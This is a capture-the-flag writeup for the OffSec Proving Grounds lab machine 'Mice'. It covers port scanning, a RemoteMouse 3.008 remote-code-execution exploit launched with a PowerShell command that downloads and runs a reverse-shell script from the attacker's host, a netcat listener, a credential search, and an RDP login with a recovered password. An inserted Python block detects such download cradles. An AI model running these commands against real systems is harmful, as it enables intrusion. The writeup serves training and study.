// htb writeup OffSec Proving Grounds 2026-02-25
Mice

🧪 Machine Name: Mice

Platform: OffSec Proving Grounds
IP Address: 192.168.228.199
Difficulty: Easy


🧭 Overview

This PG machine exposes RemoteMouse and other uncommon ports. RemoteMouse 3.008 is known to be vulnerable to RCE. We leverage that to gain an initial foothold via a PowerShell reverse shell, then discover FileZilla credentials and escalate to Administrator via a known LPE vulnerability. Screenshots prove both user and root access.


🔍 Enumeration

🔎 Nmap

nmap -p- --min-rate 10000 192.168.228.199
PORT     STATE SERVICE
1978/tcp open  remotemouse
1979/tcp open  unisql-java
1980/tcp open  pearldoc-xact
3389/tcp open  ms-wbt-server
7680/tcp open  pando-pub
nmap -p 1978,1979,1980,3389,7680 -sCV -oN nmapscan 192.168.228.199

⚙️ Exploitation – RemoteMouse RCE

🔁 Hosted revshell:

# PowerShell revshell saved as own.ps1
sudo python3 -m http.server 80

🐭 Trigger exploit:

./RemoteMouse-3.008-Exploit.py --target-ip 192.168.228.199 \
  --cmd "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.45.206:80/own.ps1')\""
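
A defender-side view of the trigger command above, as an added example that is not part of the original writeup: a Python triage over process-creation command lines that flags the fetch-and-execute pattern used here. Only the first command line comes from the writeup; the other events and the record shape (`id`, `cmd`) are constructed assumptions.

```python
import re

# Fetch and execute primitives that make up a PowerShell "download cradle".
FETCH = re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
EXEC = re.compile(r"\biex\b|Invoke-Expression", re.I)
URL = re.compile(r"""https?://([^/:'"\s]+)(?::\d+)?[^'"\s)]*""", re.I)
RAW_IP = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)

def classify(cmdline):
    """Return (severity, reasons) for one process-creation command line."""
    if not POWERSHELL.search(cmdline):
        return "none", []
    reasons = []
    fetches = bool(FETCH.search(cmdline))
    cradle = fetches and bool(EXEC.search(cmdline))
    if cradle:
        reasons.append("remote content fetched and executed in memory")
    url = URL.search(cmdline)
    if fetches and url and RAW_IP.fullmatch(url.group(1)):
        reasons.append("fetch from raw IP " + url.group(1))
    severity = "high" if cradle else "medium" if reasons else "none"
    return severity, reasons

def triage(events):
    """Map event id -> severity for every event that raised a finding."""
    findings = {}
    for ev in events:
        severity, _ = classify(ev["cmd"])
        if severity != "none":
            findings[ev["id"]] = severity
    return findings

# Constructed sample records; event 1 reuses the command line from this writeup.
SAMPLE_EVENTS = [
    {"id": 1, "cmd": "powershell -c \"iex (New-Object Net.WebClient).DownloadString('http://192.168.45.206:80/own.ps1')\""},
    {"id": 2, "cmd": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"id": 3, "cmd": "powershell -c \"Invoke-WebRequest https://downloads.example.com/tool.zip -OutFile tool.zip\""},
    {"id": 4, "cmd": "PoWeRsHeLl -nop -c \"IEX(iwr http://10.0.0.5/a.ps1 -UseBasicParsing)\""},
    {"id": 5, "cmd": "pwsh -c \"irm http://10.0.0.9:8080/inventory.json -OutFile inv.json\""},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["id"], *classify(ev["cmd"]))
```

The hostname-based download in event 3 and the local script in event 2 stay quiet, while a fetch from a raw IP without execution (event 5) is kept at medium for review.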

🖥️ Netcat shell (User)

nc -lvnp 443
whoami → remote-pc\divine
hostname → Remote-PC
type Desktop\local.txt → `7b179f432c64ed054f461afac5c5bdb0`

Mice Local Proof

🪜 Privilege Escalation

🔍 Credential Discovery

findstr /S /I /C:"pass" *.ini *.cfg *.config *.xml

🎮 RDP login:

xfreerdp3 /v:192.168.228.199 /u:"divine" /p:"ControlFreak11" /f

⬆️ Admin Privesc – RemoteMouse GUI LPE


📷 Proof

ClamAV Proof


💡 Lessons Learned


“Writeup and proof included in GitHub repo: https://github.com/inkedqt/ctf-writeups/tree/main/Other/PG/Mice”